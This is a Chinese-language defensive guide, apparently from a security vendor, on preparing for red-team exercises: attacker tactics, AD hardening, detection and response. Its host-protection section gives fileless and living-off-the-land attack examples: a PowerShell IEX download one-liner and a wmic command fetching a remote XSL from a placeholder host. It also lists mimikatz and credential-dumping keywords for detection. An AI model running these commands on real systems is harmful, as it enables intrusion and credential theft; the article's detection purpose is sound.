網站漏洞滲透測試覆盤檢查結果分析

最近我們Sinesafe參加的幾家機構的滲透測試防守方防護方案評估複查，部分防守方缺乏對攻擊者的正確認知，攻擊者的手法已經比較高超了，不掃描，不落地，汙染日誌等都很普及了。同時也要正確認知對手：攻防演練中，攻擊者並非無所不能，他們面臨著和防禦方一樣的問題：時間緊，任務重。所以攻擊者的攻擊目標，攻擊手法也是有跡可循的,知己知彼才能百戰百勝。

滲透測試

一、知彼

攻擊者也是講成本的，因此防守方最好的策略是：做的比其他防守方好一點點即可。好一點的含義：不在低階問題上犯錯（弱密碼、網際網路應用遠端RCE、管理後臺暴露、重要伺服器未打補丁等）。對於“時間緊、任務重”的防守方來說，修建固若金湯的防線顯然意味著大成本投入，以及最緊缺的時間，因此本文不會面面俱到，只選擇價效比高值得快速投入的安全措施和大家分享。

攻擊者一般：目標明確、步驟清晰、控制成本、反檢測，反清理、三流分立。

目標明確：攻擊者只攻擊得分項，和必要路徑（外網入口，內網立足點），對這些目標採取高等級手段，會隱蔽操作；對非必要路徑順路控制下來的伺服器，並不怕被發現，用起來比較隨意，甚至主動製造噪音，干擾防守方。

步驟清晰：資訊收集-控制入口-橫向移動-維持許可權-攻擊目標系統。每一步都是經典操作和教科書式手法。

控制成本：

1. 優先攻擊高許可權賬號，如管理員，目標系統負責人賬號；
2. 優先攻擊運維/安全人員賬號和終端，這些人往往有伺服器root賬號，安全裝置管理員賬號，可以進一步深入控制；
3. 優先攻擊集中管控設施，如域控，集中身份認證系統，終端管理系統，攻陷單系統即獲得公司內大部分系統的許可權；
4. 優先攻擊基礎設施，如DNS，DHCP，郵件系統，知識分享平臺，oa系統，工單系統；這些系統有內建高許可權賬號，或可以幫助攻擊者隱蔽痕跡。或Git/SVN等開發原始碼管理伺服器，透過程式碼審計發現應用0day漏洞。

反檢測，反清理：

1. 樣本隱蔽技術（白利用（帶微軟簽名的程式執行未簽名的黑dll），樣本不落地執行（從網上載入樣本，只執行在記憶體，不落盤不驚動殺軟））；
2. 快速擴散（攻擊者會將攻擊包做成自動化工具，降低人力投入，快速控制一批有漏洞發伺服器）；
3. 停止日誌外發，日誌清除（指令碼優先停止常見日誌外發工具；同時有開源自動化工具來劫持日誌產生的程式，使得系統不產生日誌；使用完後刪除access.log等日誌）；
4. 減少掃描，透過分析日誌、分析配置檔案、管理員來源IP等方式來獲取內網的其他機器IP資訊，而不是掃描。
5. 點選新增圖片描述（最多60個字）

三流分立：

1. 掃描流：用來大批次掃描內網存活IP和漏洞，掃描源通常不被攻擊者重視，被清除也不會影響到攻擊計劃，高水平攻擊者通常使用掃描行為來分散防守方精力。
2. 資料流：用來向外網大量傳輸非關鍵資料，通常是有網際網路許可權的終端或伺服器（終端較多），很少有隧道行為或掃描行為，透過簡單的https，sftp方式傳輸資料
3. 控制流：用於接受和傳遞遠控指令的伺服器，攻擊者最重視的設施，使用起來最為謹慎，和遠控中心進行交流，常用元件cobaltstrike， empire；有隧道行為，且資料傳輸量很少，會連線若干個IP和域名（避免外網封禁），傳輸必定加密，不使用自簽名證照。

在本次攻防實戰演習準備階段，攻擊方準備了幾十個C2域名。

二、知己知己，主要是知曉防守方防守區域內的資產資訊，縮小暴露面。原則如下：

1. 不用的系統，該下的下，該暫停的暫停。不用的功能，該下的下，該暫停的暫停。（平時就應該這樣處理，而不是戰時）
2. 該取消訪問的取消，能限制訪問範圍的限制訪問範圍。
3. 在用的，搞清楚功能，雙流（資料流和運維流）誰用，有沒有風險，能否一鍵處置。

縮小暴露面 1.按資產所屬緯度梳理

網際網路資產、分支機構資產、子公司資產、外聯公司資產、公有云資產、開發商、外包商。

容易忽視的：

1. 公有云資產，因為有的業務部門和分支機構公有云申請都不經過IT部門，上面卻放了大量業務資料。
2. 開發商/外包商的資產。開發商/外包商一般給甲方外包開發資訊系統，開發商/外包商公司內部也會自建Git/SVN等原始碼管理伺服器，存有已經交付給甲方的資訊系統原始碼，而開發商/外包商的原始碼系統管理安全能力和甲方相比可能就差幾個量級了。後果就是：透過獲得的原始碼，發現系統應用0day，從而控制甲方已上線資訊系統。

縮小暴露面 2.按資產屬性梳理

特別關注資產的安全屬性：中介軟體或框架（版本）、開放在公網API介面（特別是未下線的老介面）、管理後臺開放在公網、高危功能（檔案上傳點、簡訊驗證碼、重置密碼、檔案下載）、遠端接入點（VPN）、特權賬戶（應用管理特權賬戶、應用連線賬戶、系統管理特權賬戶、可以修改賬戶許可權的賬戶、備份賬戶、高管層賬戶）。

每一個安全屬性都是血的教訓。

縮小暴露面 3.忽視點

1. 所有內部文件伺服器上（含OA、郵件系統、jira、wiki、知識庫等）敏感資訊清理或限制訪問許可權，不要有：網路拓撲、安全防護方案和部署位置、各類密碼；
2. 資產管理平臺上，蜜罐不要叫蜜罐、安全裝置IP要隱藏；
3. 各類口令：弱口令、預設口令、已洩露口令。

每一個忽視點都是眼淚的結晶。

安全資產管理，更多內容參加：安全資產管理中容易被忽視的幾點

三、防護關鍵點

臨戰前，再想按照大而全的梳理一遍，幾無可能，最好就是把防護關鍵點過一遍，切記都實際看一遍，不要相信別人的反饋。

3.1 安全隔離

滲透測試繞過

從實戰來看，網路層的訪問控制被證明是最有效的（攻擊者很難繞過去），不要相信應用層控制。網路層訪問控制屬於基礎架構安全，這是最有效最重要的，整個安全防護的基礎。

訪問控制策略原則：明細允許，預設拒絕。

1. 從內網去網際網路的訪問控制
2. 辦公終端：除個別協議無法限制目的IP外，其餘協議全部限制。特殊訪問需求，快速開通。有條件的考慮：終端不能直接訪問網際網路，需要訪問網際網路的兩種解決方案：另外分配一臺上網終端、虛擬瀏覽器
3. 辦公伺服器：特殊訪問需求開通，預設拒絕

生產網：生產網終端禁止上網際網路、伺服器特殊訪問需求開通，預設拒絕

2.網際網路訪問內網：對網際網路提供服務的伺服器必須在DMZ，和內網隔離。

3.重要系統的訪問控制策略

• 基礎設施如AD、郵件系統的訪問控制。
• 別小看基礎設施ACL訪問控制，這是對抗應用和系統漏洞的最低成本和最有效措施。漏洞層出不窮，唯有ACL訪問控制藥效持久，強烈推薦。
• 終端安全管控、自動化運維繫統等集中控制系統後臺登入限制訪問來源。（優先使用網路訪問控制、其次使用系統層限制、搭配使用應用層限制）

3.2 AD防護

1. 準備階段

2.加固階段

對抗許可權提升：對域賬號進行許可權DACL梳理，加固高許可權賬號

1. 檢測高許可權賬號可以用bloodhound駭客工具監測，也可以透過System Internal Tools的ADExplorer來進行檢測：
2. 1）修改密碼（建議在演習前臨近時間進行修改）
3. 2）調整許可權和分組，根據賬號的歸屬人的許可權進行調賬，取消非域管賬號的敏感許可權。
4. 3）修改分組內的不合適的人員賬號。
5. 4）敏感賬號不允許委派。
6. 5）敏感賬號不允許取消Kerberos預鑑權。
7. 6）敏感賬號的密碼強度符合規定。
8. 7）具備直接域管或者間接域管許可權（例如可以修改Domain Admins的賬號就具備間接域管許可權）的賬號的活動進行報備制度，演習期間未經允許不得進行任何操作，包括登入等等。
9. 8）辦公機和終端演習前全部重啟，消除敏感賬號憑據留存。
10. 9）伺服器登入檢視相關憑據，如果有刪除或透過登出來刪除伺服器上留存的憑據。
11. 10）參照https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-f--securing-domain-admins-groups-in-active-directory配置域管理員許可權。
12. 對抗攻擊者使用MS14-068，MS17-010攻擊域：從舊到新依次安裝DC上的windows補丁。
13. 對抗攻擊者使用ExchangeSSRF漏洞：從舊到新依次安裝Exchange上的windows補丁。
14. 對抗LDAP relay攻擊：在域控上配置LDAP enforce signing。
15. 對抗LDAP relay和SSRF攻擊：在域控上配置LDAPS channel binding。
16. 對抗LLMNR/NBT Poisoning攻擊：關閉域內WPAD服務。

3.檢測階段

滲透測試檢測階段

原則：若域不安全，最佳修復方案是重灌。

1. 檢測敏感共享目錄訪問：訪問了AD伺服器的非正常共享目錄 （非SYSVOL資料夾）
2. 檢測mimikatz一系列攻擊行為：
3. Mimikatz透過sysmon程式來進行檢測，常見關鍵字有“gentilkiwi (Benjamin DELPY)”（公司名稱）、
4. 其他關鍵字：kerberos::golden sekurlsa::pth kerberos::ptt lsadump::dcshadow lsadump::dcsync sekurlsa::logonpasswords privilege::debug misc::skeleton
5. 檢測Kerberos弱加密方式：非AES加密方式的Kerberos加密請求相當可疑
6. 檢測異常登錄檔變更和dump：DSRMAdminLogonBehavior
7. 變更AdminSDHolder
8. 匯出HKLM\SAM內容
9. 匯出HKLM\SYSTEM內容
10. 匯出HKLM\SECURITY內容
11. 檢測ntdsutil濫用：使用了ntdsutil的敏感引數activate instance ntds ；使用了ntdsutil的敏感引數set dsrm password
12. 檢測SID history變更：賬號加入SID History成功、失敗
13. 檢測lazagne密碼提取工具：特徵 lazagne
14. 攻擊者喜歡用的其他工具：
15. procdump、PsExec、cain、Mshta、cmstp、QuarkPwDump、getpass、gethash、ntdsdump、Get-PassHashes、Wce、psaattack。

3.3 主機防護（終端和伺服器）對抗

攻擊者在嘗試控制終端和伺服器時，為了繞過常規的防毒軟體，通常會使用一些免殺手段。而某些免殺手段（如白利用，樣本不落地執行）由於非常穩定和高效，更是受到廣大攻擊者的青睞。

1.Powershell IEX組建下載執行.(檔案在記憶體執行，不落硬碟)

利用程式碼示例：powershell.exe -nop -whidden -c IEX ((new-objectnet.webclient).downloadstring('))">

監測特徵："IEX” AND “(New-Object Net.WebClient).DownloadString“

2.Windows系統白檔案利用(wmic.exe

利用程式碼示例：cmd/c wmic os get /format:”\\x.x.x.x\1.xsl”&start/wait notepad

監測特徵："wmic os get" AND "/format"3.Windows系統白檔案利用(csc.exe)

利用程式碼示例：

"C:/Windows/Microsoft.NET/Framework64/v2.0.50727/csc.exe"/noconfig /fullpaths@"C:/Users/a/AppData/Local/Temp/l1xso2zu.cmdline"

監測特徵："csc.exe" AND ("/r:System.EnterpriseServices.dll"OR "/unsafe")4.Windows系統白檔案利用(msiexec.exe)

特徵：被動執行後臺執行的引數，有一定誤報率。請自行研究，不再舉例。

5.檢測certutil白利用

特徵：常見繞防火牆使用的引數。請自行研究，不再舉例。

6.檢測透過url.dll來進行不落地執行

請自行研究，不再舉例。

3.4 賬戶和許可權對抗

• 高許可權一律清理，限制使用範圍，每次使用後確認。
• 應用許可權透過日誌分析檢測濫用。
• 關注備份賬戶、可修改許可權賬戶的使用。
• 終端24小時重啟一次。（對抗終端許可權抓取類攻擊）

3.5 瞬間死亡

瞬間死亡有兩種方式：路徑打穿、系統打穿。

3.5.1 路徑打穿

直接從未想過（未設防）的路徑攻擊過來。郵件是控制終端第一選擇入口，具體防護可參見《企業安全建設指南：金融行業安全架構與技術時間》第16章：郵件安全。

邊緣網包括無線和自助終端，包括：打卡機、自動售賣機、會議室裝置、ATM機、排隊機等。限制無線和自助終端網路和內網訪問。

限制分支機構、外聯公司等網路和總部的網路訪問。

不要相信理論上不能全通，但實際上存在全通內網的系統。（死於方便性）

3.5.2 系統打穿

系統打穿，都是血淚史。因為我們總是忘記了這些最大的風險源。優先攻擊中心化的系統和跨兩網的系統，包括終端安全管控控制檯（控制檯安全防護能力很弱）、運維管理系統/Zabbix/Nagios/堡壘機等、單點登入SSO系統、AD活動目錄；

1. 優先攻擊基礎設施：DNS、DHCP、郵件系統、研發伺服器SVN/Git；
2. 高價值終端：
3. 網路管理員：終端內有網路拓撲和ACL控制策略，甚至可以修改訪問控制；
4. 安全管理員：有安全防護方案和檢測系統、告警系統登入許可權，很多安全系統做了登入來源限制，繞過手段之一就是控制安全管理員的終端，同時抓取安全管理員賬戶密碼，攻擊者一舉兩得；
5. 研發個人終端/運維個人終端：高價值資料；
6. 內網掃描器：網路許可權較大，哪都能去。
7. 程式碼伺服器：程式碼資料價值比較高。私有協議開發的應用程式，原始碼要保護好，有經驗攻擊團隊帶程式碼審計技能成員，透過原始碼審計發現應用0day

3.6 容易出問題的點

• 網際網路應用框架RCE
• 應用和中介軟體管理後臺暴露
• VPN：未啟用雙因素，或存在未啟用雙因素的部分使用者
• 測試環境的測試系統未及時打補丁、弱密碼
• 透過郵件入口控制辦公終端
• 跨兩網的裝置
• 伺服器密碼同質問題
• 社工

四、事中和事後

前面分享了很多防護和檢測的事項，但防守方到了這個階段，更重要的是考慮一下事中的各種過載資訊的研判和快速應急處置措施。

我們打內部攻防演習的時候，最大的困擾是決策和處置。

4.1 過載資訊研判

有效高速的決策機制，什麼許可權範圍內的由什麼人決策，這是授權。

什麼崗位（人）負責什麼，這是職責劃分。比如誰負責跟蹤每條告警資訊到Closed狀態？誰負責斷網？誰負責樣本分析？誰負責失陷主機排查？誰負責溯源路徑？誰負責記錄？誰負責彙報？等等。

4.2 快速應急處置

4.2.1 硬體和後勤

• 大的作戰室，容納全部防守隊伍；
• 好的白板（最好電子的），便於梳理攻擊路徑；
• 準備好零食和一日三餐、行軍床。

4.2.2 重要資訊同步

• 已經淪陷的IP清單（黑名單），同步給所有防守方；
• 是否C2域名快速判斷，注意真假難辨的域名。

4.2.3 各類應急處置措施

• 斷網：快速斷網的操作規範和自動化工具
• 誘餌
• 臨時新增ACL和FW規則
• 下線業務：和業務方建立暢通的溝通機制和快速的決策機制

如果失陷（疑似）主機，決策用於誘餌，務必確保誘餌的風險可控，萬一持續利用誘餌在內網橫向移動，再進行限制就困難了。

注意體力分配，高水平攻擊者通常使用掃描行為等方式來分散防守方精力。

4.3 滲透測試複檢

攻防實戰演習後的總結改進提升，才是最終目的。

4.3.1 防護薄弱點和改進措施

• 安全團隊
• 協作團隊
• 廠商和第三方

安全團隊不好推動的工作，不好講的話，要不到的資源，都可以在這裡提出來。

應急處置薄弱點和改進措施，落實到人、計劃和資源中，才是務實的。

4.3.3 資源不足，要資源

安全運營是必由之路，參見 金融業企業安全建設之路

7*24小時的安全運營，既然攻擊對手是7*24小時的，為什麼安全運營不是呢？

4.3.4 必要的管理層彙報

五、注意事項

不要影響業務。攻防演習前的加固，需要妥善評估對業務可用性影響，攻防演習中的應急處置，需要妥善評估對業務可用性影響,畢竟，業務可用性才是老大，安全不是，擺正心態和位置,如果對滲透測試有想法的朋友可以找專業的網站安全公司來處理解決，國內推薦Sinesafe,綠盟,啟明星辰,等等的網站安全公司。